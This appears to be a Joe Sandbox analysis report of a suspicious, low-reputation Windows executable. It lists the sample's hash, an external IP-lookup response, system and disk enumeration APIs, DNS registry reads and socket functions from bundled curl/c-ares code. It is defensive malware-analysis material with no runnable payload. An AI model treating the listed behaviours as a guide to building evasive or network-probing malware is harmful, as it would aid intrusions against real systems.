                                                        Date: Mon, 23 Dec 2024 05:54:18 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
2024-12-23 05:54:18 UTC | 31 | IN | Data Ascii: { "origin": "8.46.123.189"}


Target ID: 0
Start time: 00:54:13
Start date: 23/12/2024
Path: C:\Users\user\Desktop\2OJYjm4J1B.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\2OJYjm4J1B.exe"
Imagebase: 0x250000
File size: 4'456'448 bytes
MD5 hash: 49F7C4981EB383AED2C3F6588545B605
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                          Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 19.2%
Total number of Nodes: 245
Total number of Limit Nodes: 41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: 97679c901d62fb0e1c99ad722292c35eed1b0cfce3bcba8223c87746a4afdc92
                                                          • Instruction ID: 74341e45ba0ff95af0f8df912996225331a8eb53806fb35ffb23117b129eed7e
                                                          • Opcode Fuzzy Hash: 97679c901d62fb0e1c99ad722292c35eed1b0cfce3bcba8223c87746a4afdc92
                                                          • Instruction Fuzzy Hash: 48C2E235A143459FD724DF29C584B6AB7E1FF88314F04866DEC988B2A2D770EDA4CB81

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 00252579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 002525CC
                                                          • GetDriveTypeA.KERNELBASE ref: 00252647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0025267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 002527E2
                                                          • FindFirstFileW.KERNELBASE ref: 002528F8
                                                          • FindNextFileW.KERNELBASE ref: 0025291F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                          • String ID: ;%%$@$`
                                                          • API String ID: 3271271169-1167538584
                                                          • Opcode ID: ce5ed24d1e4e8f2f94fb7c788ce162924d57deb8d4f135c194a98152320adf70
                                                          • Instruction ID: 73a70d668ff295699178670904808930c96fbab6544a1c218b47b7ffa4107854
                                                          • Opcode Fuzzy Hash: ce5ed24d1e4e8f2f94fb7c788ce162924d57deb8d4f135c194a98152320adf70
                                                          • Instruction Fuzzy Hash: F6D1B5B59147099FCB50EF68C58569EBBF1FF44304F00886EE898D7350E7759A888F92

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: cce27d5ef578a8cc346f05fa115c5b6138ccee12920a2c242e0f8aeaf7900774
                                                          • Instruction ID: 219ec856998cbfa02c4cfb90031cb846bec00828aa84e4442a1cfb909a58dd73
                                                          • Opcode Fuzzy Hash: cce27d5ef578a8cc346f05fa115c5b6138ccee12920a2c242e0f8aeaf7900774
                                                          • Instruction Fuzzy Hash: D0E1D1B0915305DFCB50EFA8D98569DBBF5EF84304F50886AE988DB390E7749988CF42

                                                          Control-flow Graph

                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,?,?), ref: 00260711
                                                          • WSAEventSelect.WS2_32(?,?,00000000), ref: 002609DD
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002609FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: N=%$multi.c
                                                          • API String ID: 2170980988-1447425148
                                                          • Opcode ID: 190f80d42bddbb79b32dbd048727d871eee93d6ed2beddf4b807fdc6f831d3f9
                                                          • Instruction ID: 686b63f3966bf3a94a9d2c80c80c0e276b117962b82c09c2a91ead7cbd145ad3
                                                          • Opcode Fuzzy Hash: 190f80d42bddbb79b32dbd048727d871eee93d6ed2beddf4b807fdc6f831d3f9
                                                          • Instruction Fuzzy Hash: 67D1B1716283029FE711CF64C881B6BB7E9FF94344F04482CF98586291E7B4E9A9DB52

                                                          Control-flow Graph

                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0031B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-2430778319
                                                          • Opcode ID: cd6e3c4d531404f3572a934f9a8b06922ce25f0b3d214b5a97e1b98b3c88712e
                                                          • Instruction ID: 6a74c0ab8c8a75dd49d99d70d52b34f7cccaceddd38a7af530c01711745b6af0
                                                          • Opcode Fuzzy Hash: cd6e3c4d531404f3572a934f9a8b06922ce25f0b3d214b5a97e1b98b3c88712e
                                                          • Instruction Fuzzy Hash: 31C17E356043059FD719DF24C880AAAB7E2FF8D354F05886DE8998B3A1DB31ED85CB81
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0030712E,?,?,?,00001001,00000000), ref: 0031A90D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: 2bf41deae26bd1ee58eae6c853107fab0a0a7ad710dafb0865a4f200ba4b1bb9
                                                          • Instruction ID: d8e7995b8a8724198e131bd4f1df8c9a1f2fbe18b4882d8c55d7ebc2ebc365c9
                                                          • Opcode Fuzzy Hash: 2bf41deae26bd1ee58eae6c853107fab0a0a7ad710dafb0865a4f200ba4b1bb9
                                                          • Instruction Fuzzy Hash: 93F06D7511930CAFD2109E01DC44DABBBEDEFCD764F05455DF948132118370AE50DAB2
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0030AA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0030AA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0030AA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0030AAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0030AB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 0030AB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0030AB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0030AC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0030AD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 0030AD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 0030ADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 0030AE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0030AE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0030AE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0030AF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0030AFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0030B072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$CloseEnum
                                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                          • API String ID: 4217438148-1047472027
                                                          • Opcode ID: d52f049743602f247148598be84b84c8bdeb7760fd9c1023bdd35bba24e6ffc4
                                                          • Instruction ID: 5da6f4684d1275d39ab267cb9f1f620840a3058d8ea25e6eb837408497e12a28
                                                          • Opcode Fuzzy Hash: d52f049743602f247148598be84b84c8bdeb7760fd9c1023bdd35bba24e6ffc4
                                                          • Instruction Fuzzy Hash: F872DEB1609701AFE321DB24DC92B6BBBE8AF85700F154828F985DB2D1E775E844CB53
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0028A831
                                                          Strings
                                                          • @, xrefs: 0028A8F4
                                                          • Trying [%s]:%d..., xrefs: 0028A689
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0028ADAC
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 0028AE60
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0028A6CE
                                                          • Bind to local port %d failed, trying next, xrefs: 0028AFE5
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0028A796
                                                          • Could not set TCP_NODELAY: %s, xrefs: 0028A871
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0028AE1F
                                                          • cf-socket.c, xrefs: 0028A5CD, 0028A735
                                                          • Trying %s:%d..., xrefs: 0028A7C2, 0028A7DE
                                                          • @, xrefs: 0028AC42
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0028AD0A
                                                          • bind failed with errno %d: %s, xrefs: 0028B080
                                                          • Local port: %hu, xrefs: 0028AF28
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: 7e450a89ceac812298e04a9affa7744402dd2ad9fa13a2a3216547421021a453
                                                          • Instruction ID: a209be24443def980a9bcdd5d626e09bb3494ebbf082e13b6d8d824342e7b2a3
                                                          • Opcode Fuzzy Hash: 7e450a89ceac812298e04a9affa7744402dd2ad9fa13a2a3216547421021a453
                                                          • Instruction Fuzzy Hash: E7621675519341ABF720DF14C846BABB7E4FF90304F04492AF98897292EB71E865CB93

                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00319946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00319974
                                                          • RegCloseKey.KERNELBASE(?), ref: 0031998B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                          • API String ID: 3677997916-4129964100

                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 00288C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00288CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: Sleepconnect
                                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                          • API String ID: 238548546-879669977

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: EnumOpen
                                                          • String ID: d
                                                          • API String ID: 3231578192-2564639436

                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,N=%,00000000,?,?,002607BF), ref: 002576EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: LIMIT %s:%d %s reached memlimit$N=%$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                          • API String ID: 2809346765-3276011351

                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0028935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00289389
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                          • API String ID: 1507349165-640788491

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                          • API String ID: 98920635-842387772

                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0028A1C6
                                                          Strings
                                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0028A23B
                                                          • getsockname() failed with errno %d: %s, xrefs: 0028A1F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3358416759-2605427207

                                                          APIs
                                                          • WSAStartup.WS2_32(00000202), ref: 0026D65B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID: if_nametoindex$iphlpapi.dll
                                                          • API String ID: 724789610-3097795196

                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0031AB9A
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0031ABE4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID:
                                                          • API String ID: 416004797-0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID: FD %s:%d sclose(%d)
                                                          • API String ID: 2781271927-3116021458
                                                          APIs
                                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0031B29E,?,00000000,?,?), ref: 0031B0BA
                                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00303C41,00000000), ref: 0031B0C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID:
                                                          • API String ID: 374722065-0
                                                          APIs
                                                          • gethostname.WS2_32(00000000,00000040), ref: 00304AA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: gethostname
                                                          • String ID:
                                                          • API String ID: 144339138-0
                                                          • Opcode ID: 862c44ba48919e934aa7aded5d0db498e72375d2465ee486b04a9bf8b2ceba16
                                                          • Instruction ID: 9a7809c63fd61bedf0162ec45927b270e2493e8c57c573e824af54ac93f3851e
                                                          • Opcode Fuzzy Hash: 862c44ba48919e934aa7aded5d0db498e72375d2465ee486b04a9bf8b2ceba16
                                                          • Instruction Fuzzy Hash: 7C5106F06067009BE7329F69DE6972376D4AF01315F05183DEA8A8AAD1E7B4EA44C742
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0031AFD1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID:
                                                          • API String ID: 3358416759-0
                                                          • Opcode ID: b18ad57931dc9bca5d8f07d2dfefe66ecf6fac78e6410e5572ad9016a5bc7e59
                                                          • Instruction ID: 2f90084e14b412cb4c8c2ba3d7d82bc5243b73f2e4cf5c4ea2efc90f3c3eafc9
                                                          • Opcode Fuzzy Hash: b18ad57931dc9bca5d8f07d2dfefe66ecf6fac78e6410e5572ad9016a5bc7e59
                                                          • Instruction Fuzzy Hash: 90116670808B8595EB2A8F18D8027F6F3F4EFD4329F109619F59942550F7729AC68BC2
                                                          APIs
                                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0031A97F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: f15ae21a0c40087d5e4a7965191c843013476f0984717276ac6581fca7bf59d2
                                                          • Instruction ID: b81f071cf3188fbdc95878c31d8aff3e02ac531d70d97799b7615d81fa0acabe
                                                          • Opcode Fuzzy Hash: f15ae21a0c40087d5e4a7965191c843013476f0984717276ac6581fca7bf59d2
                                                          • Instruction Fuzzy Hash: 1D01A771B017149FC6158F14D845B96B7A5EF84721F068559F9981B361C331BC508BD1
                                                          APIs
                                                          • socket.WS2_32(?,0031B280,00000000,-00000001,00000000,0031B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0031AF67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID:
                                                          • API String ID: 98920635-0
                                                          • Opcode ID: 99001baa9a4f49b93a24538914bd0869921a94899a96c990757f8d7912c63732
                                                          • Instruction ID: 32da174348398e1885e8fe174ddc79d34e276bff3a60d4540bedb99ce4f7ced5
                                                          • Opcode Fuzzy Hash: 99001baa9a4f49b93a24538914bd0869921a94899a96c990757f8d7912c63732
                                                          • Instruction Fuzzy Hash: 18E0E5B6A056216BD555DA18E8449ABF369EFC4B11F055A49B85457304C330AC5187E2
                                                          APIs
                                                          • closesocket.WS2_32(?,00319422,?,?,?,?,?,?,?,?,?,?,?,w30,006E8640,00000000), ref: 0031B04D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID:
                                                          • API String ID: 2781271927-0
                                                          • Opcode ID: 51df4f2abbaf6480c31f56293cf93e65a1f2e07aa864d222a1c71525a26e53dd
                                                          • Instruction ID: 2a0efd9e778a1bb9bf93f0648df0fac7540e20f524286837e38f1f0b1b382422
                                                          • Opcode Fuzzy Hash: 51df4f2abbaf6480c31f56293cf93e65a1f2e07aa864d222a1c71525a26e53dd
                                                          • Instruction Fuzzy Hash: F9D0C23430020157CA288A14C884A97B26B7FC8310FA9CB6CE02C8A160C73BCC838601
                                                          APIs
                                                          • ioctlsocket.WS2_32(?,8004667E,?,?,0028AF56,?,00000001), ref: 002B67FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: ioctlsocket
                                                          • String ID:
                                                          • API String ID: 3577187118-0
                                                          • Opcode ID: c2969d2fff838ed7ecffaece353f6f324c0bfcf722ef9ad633545515d191a21f
                                                          • Instruction ID: cf197a33307673fae5981a8a78e34832f12856552c5e8151f62079c405236f7b
                                                          • Opcode Fuzzy Hash: c2969d2fff838ed7ecffaece353f6f324c0bfcf722ef9ad633545515d191a21f
                                                          • Instruction Fuzzy Hash: 06C012F1218101AFC6088724D455F2FB6D9DB44365F01581CB046C1190EA305990CA16
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 0ba2a3677ac23c7b1b3561f722c9de052bfc159db0bb98e89ec346d98156f979
                                                          • Instruction ID: c75f5a228fc32a4fdb2a6a3c35671f24d4bc40312fb77392b96b8ae3c51b48d7
                                                          • Opcode Fuzzy Hash: 0ba2a3677ac23c7b1b3561f722c9de052bfc159db0bb98e89ec346d98156f979
                                                          • Instruction Fuzzy Hash: 973192B1D147059BCB50EFA8C58569EBBF4BF44344F00886EE898E7301E7749A488F52
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 895ecf07aa25c614233177ec8c37cc56dc316f4aa6dacb9fbae3fc04d058247b
                                                          • Instruction ID: 3d594bcbd009574b00663e8c63257ccec64304e6f9c0818071db428b2b3c047e
                                                          • Opcode Fuzzy Hash: 895ecf07aa25c614233177ec8c37cc56dc316f4aa6dacb9fbae3fc04d058247b
                                                          • Instruction Fuzzy Hash: 2FC09BE0C1574447DB00BF3CC64611E79E97741104FC11F68D98896195F73CD31C8667
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          Similarity
                                                          • API ID:
